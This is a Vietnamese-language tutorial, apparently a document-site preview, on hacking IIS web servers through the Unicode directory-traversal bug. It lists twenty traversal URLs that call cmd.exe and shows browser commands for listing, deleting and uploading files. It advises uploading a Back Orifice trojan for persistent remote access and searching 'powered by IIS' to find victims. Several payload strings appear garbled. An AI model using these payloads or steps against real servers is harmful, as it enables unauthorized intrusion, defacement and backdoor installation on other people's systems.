Hack IIS server bằng UNICODE bug
Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (50.42 KB, 2 trang )
Hack IIS server bằng UNICODE bug :
trang này đã được đọc lần
Giới thiệu :
• Các bạn thường hỏi : Làm thế nào các Hacker , hack được một website ??
• Tôi sẽ trình bày với các bạn cách hack một website trên IIS server. Hiện nay có rất nhiều cách hack
IIS server nhưng tôi sẽ giới thiệu cho các bạn cách đơn giản nhất !
Hack IIS server bằng UNICODE bug :
• Theo thống kê của Microsoft thì có khoảng 13 triệu website trên NET hiện nay dùng IIS server cũng
như các sản phẩm của MS thì version 5 và 6 của IIS server có một lỗi rất nghiêm trong là lỗi
UNICODE (Unicode bug). Dĩ nhiên là MS đã đưa ra bản patch sửa lỗi nhưng trong số hơn 13 triệu
website tất cả đã được patch :)
• Bắt đầu tiến hành :
1. Xác đinh website có dùng IIS hay không : có nhiều cách để xác đinh bằng cách dùng các
tool hacker , nhưng ở đây chúng ta chỉ cần dùng telnet, ở cửa sổ Run của Windows bạn
đánh : telnet . Rồi chọn
Host: diachitrangweb.com | Port: 80 | Term type: vt100
Lúc đó sẽ hiện lên thông báo về server của website và bạn sẽ biết nó có dùng IIS server
không ?
2. Ðồ nghể để hack : Bạn phải cài Perl trên máy (giới thiệu : dùng Active Perl 552 (~5M)
đownload ở ) và file unicode (download ở đây : unicode.pl )
3. Sau khi đã cài đặt xong Perl , ở của sổ MS-DOS promt bạn gõ :
perl unicode.pl www.diachiwebsite.com:80
Chờ một chút nó sẽ tìm các bug trên IIS, có 20 bug UNICODE của IIS:
[1] /scripts/..%c0%af../winnt/system32/cmd.exe?/c+
[2]/scripts..%c1%9c../winnt/system32/cmd.exe?/c+
[3] /scripts/..%c1%pc../winnt/system32/cmd.exe?/c+
[4]/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+
[5] /scripts/..%c0%qf../winnt/system32/cmd.exe?/c+
[6] /scripts/..%c1%8s../winnt/system32/cmd.exe?/c+
[7] /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+
[8] /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+
[9] /scripts/..%c1%af../winnt/system32/cmd.exe?/c+
[10] /scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+
[11]/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+
[12] /scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+
[13] /scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+
[14] /msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\
%e0\%80\%af../winnt/system32/cmd.exe?/c+
[15] /cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[16] /samples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[17] /iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[18] /_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[19] /_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
[20] /adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..
%c0%af../winnt/system32/cmd.exe?/c+
4. Ví dụ nó scan ra được bug 15 thì ở URL của Browser bạn gõ :
/>%c0%af../winnt/system32/cmd.exe?/c+
Hè hè !! bây giờ tôi đã vào được server của nó rồi !! muốn làm gì thì làm !! bằng các lênh
DOS cổ lỗ sĩ thông thường
Ví dụ : để dir ổ C của server bạn đánh như sau ở Browser :
/>%c0%af../winnt/system32/cmd.exe?/c+dir+c:\
Cũng thế bạn có thể mở thư muc MD, đổi tên thư mục RD, xem file, xoá file ...... như
DOS :))
5. Bây giờ quan trọng là phải đưa trang Web của mình vào đó, bạn CD vào thư mục:
c:\inetpub\wwwroot
bạn cần 3 file : cgidecoderloader.pl, upload.asp, upload.in (ở cùng một thư mục trên ổ
cứng - đownload ở đây - upload.zip)
cỏ của sổ MS-DOS promt bạn gõ :
perl cgidecoderloader target:80 'f:\inetpub\wwwroot'
Sau khi qua' trình hoàn thành, ở browser bạn đánh :
rồi upload thứ gì ban muốn (Lời khuyên :
upload 1 trojan backorffice để mở port để sau này ban có thể Remote Access đươc.
6. Giới thiệu mọtt só website để bạn thực tập (không phải website ViêtNam) :
.............
o Bonus track : Vấn đề khó khăn cho các bạn là làm thế nào để tìm được website để hack ,
đay là một thủ thuât dơn giản : ban vào trang rồi search với thuât ngữ
sau : "powered by IIS"
Lúc đó sẽ có vô số trang web cho bạn hack mệt nghỉ, chán thì thôi :))
